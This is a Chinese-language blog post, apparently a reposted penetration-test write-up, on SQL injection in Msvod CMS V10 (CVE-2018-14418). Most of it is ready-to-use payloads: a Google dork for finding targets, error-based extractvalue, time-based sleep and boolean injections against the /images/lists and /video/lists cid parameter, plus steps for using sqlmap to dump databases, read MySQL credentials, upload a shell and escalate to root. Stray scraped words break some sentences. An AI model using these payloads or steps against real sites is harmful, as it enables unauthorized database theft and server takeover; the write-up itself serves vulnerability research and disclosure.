CVE-2018-14418 擦出新火花

時間 2019-11-10

標籤 cve 出新火花简体版

原文原文鏈接

筆者《Qftm》原文發佈：https://xz.aliyun.com/t/6223html

0x00 前言

最近，一次受權的滲透測試項目意外的撞出了(CVE-2018-14418)新的火花，在這裏分享給你們，同時簡單記錄一下本身的滲透測試過程，一些敏感信息已打碼，相關漏洞已報送廠商修復。web

0x01 Msvod Cms SQL注入漏洞原始

詳解

漏洞ID	1226187	漏洞類型	SQL注入
發佈時間	2018-07-20	更新時間	2018-07-23
CVE編號	CVE-2018-14418	CNNVD-ID	CNNVD-201807-1724
漏洞平臺	PHP	CVSS評分	N/A

漏洞來源

https://www.exploit-db.com/exploits/45062
https://cxsecurity.com/issue/WLB-2018070221
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-1724

漏洞詳情

Msvod Cms是一套用於視頻點播網站的內容管理系統（CMS）。該系統主要提供視頻點播和視頻聚合建站等服務。 Msvod Cms 10版本中存在SQL注入漏洞。遠程攻擊者利用該漏洞執行任意的SQL命令。sql

漏洞EXP0.1

# Exploit Title: MSVOD V10 ¡V SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/

Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20

0x02 Msvod Cms SQL注入漏洞擦出新火花

資產收集

指紋探測（此處推薦雲悉指紋探測http://www.yunsee.cn/finger.html）shell

Nmap掃描站點端口狀況數據庫

手工測試分析

手工測試發現站點存在僞靜態服務器

經過測試發現存在SQL Injection同時得知該站點是一個MsvodX的CMSide

經過搜索獲得該CMS版本存在SQL注入漏洞工具

繼續探索發現該漏洞原理和本身發現的本質同樣學習

CVE-2018-14418 擦出新火花測試

後面直接利用/video/lists?cid=num進行注入能夠達到執行任意SQL命令

此處注入獲得MySQL版本和用戶信息

Payload:

/video/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(version()),CHAR(126)))--%20

/video/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(user()),CHAR(126)))--%20

新的漏洞EXP

漏洞EXP1.1（/images/lists?cid=13）

Payload:
/images/lists?cid=13 ) ORDER BY if(1=1,1,sleep(3))--%20

漏洞EXP1.2（/images/lists?cid=13）

Payload:
/images/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(version()),CHAR(126)))--%20

漏洞EXP1.3（/images/lists?cid=13）

Payload:
/images/lists?cid=34) AND 5072=5072 AND (7051=7051

漏洞EXP2.1（在/video/lists?cid=13處發現新漏洞）

Payload:
/video/lists?cid=13 ) ORDER BY if(1=1,1,sleep(3))--%20

漏洞EXP2.2（在/video/lists?cid=13處發現新漏洞）

Payload:
/video/lists?cid=13 ) AND extractvalue(rand(),concat(CHAR(126),(user()),CHAR(126)))--%20

漏洞EXP2.3（在/video/lists?cid=13處發現新漏洞）

Payload:
/video/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,(user()),0x7c)) desc--%20

漏洞EXP2.4（在/video/lists?cid=13處發現新漏洞）

Payload:
/video/lists?cid=34) AND 5072=5072 AND (7051=70510

Payload:
/video/lists?cid=34) AND 5072=5072 AND (7051=7051

漏洞EXP3.1（SQLMAP一鍵式）

探測漏洞

爆庫

後面爆表爆字段不在細說（能夠dump數據庫）

讀取MYSQL帳戶密碼

後面能夠利用絕對路徑對該Linux服務器上傳shell(--os-shell)，以後找到服務器漏洞進行提權到root(你能夠作一些你想作的事情！！！)

漏洞EXP3.2（jsql-injection一鍵式）

探測漏洞

ps:推薦此工具很是方便管理數據庫

漏洞EXP4.1

Payload：
There are many！！！！！23333！！！

0x03 總結

SQL Injection漏洞在漏洞挖掘中仍是比較常見的，對於SQL注入漏洞突破點仍是在於數據的探索和處理上。關於漏洞的挖掘在於經驗的積累和學習。

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。